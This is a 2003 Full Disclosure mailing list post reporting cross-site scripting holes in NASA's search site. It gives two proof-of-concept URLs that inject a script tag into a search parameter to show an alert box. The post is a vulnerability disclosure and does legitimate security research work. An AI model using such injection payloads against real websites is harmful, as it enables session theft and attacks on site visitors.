Full Disclosure mailing list archives
NASA.GOV Search system Cross Site Scripting ( SEARCH.NASA.GOV )
From: "Lorenzo Hernandez Garcia-Hierro" <lorenzohgh () nsrg-security com>
Date: Wed, 15 Oct 2003 01:15:13 +0200
Hi there, --------------------- WebSite: Vendor: NASA w0w! Risk: 7-5 -------------------- VENDOR NOTICED: Yes ( same email as this ) -------------------- I'm a little surprised today..... I found some cross site scripting holes in the NASA.gov search engine , PROOF OF CONCEPT: http://search.nasa.gov/nasasearch/search/search.jsp?nasaInclude=null&Simple+Search.y=10"><script>alert("The XSS Prince\nOnce upon a time there was a prince\nthat liked so much XSS exploits....");</script> http://search.nasa.gov/nasasearch/search/search.jsp?nasaInclude=null&Go.x=17"><script>alert("The%20XSS%20Prince\nOnce%20upon%20a%20time%20there%20was%20a%20prince\nthat%20liked%20so%20much%20XSS%20exploits....");</script>&Go.y=13 Remember: website security cannot be real if maintainers don't know how much danger is a xss hole ;-) contact info: __________ ------------------------------- 0x00->Lorenzo Hernandez Garcia-Hierro 0x01->/* not csh but sh */ 0x02->$ PATH=pretending!/usr/ucb/which sense 0x03-> no sense in pretending! __________________________________ PGP: Keyfingerprint 4ACC D892 05F9 74F1 F453 7D62 6B4E B53E 9180 5F5B ID: 0x91805F5B ********************************** No Secure Root Group Security Research Team http://www.nsrg-security.com ______________________ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- NASA.GOV Search system Cross Site Scripting ( SEARCH.NASA.GOV ) Lorenzo Hernandez Garcia-Hierro (Oct 14)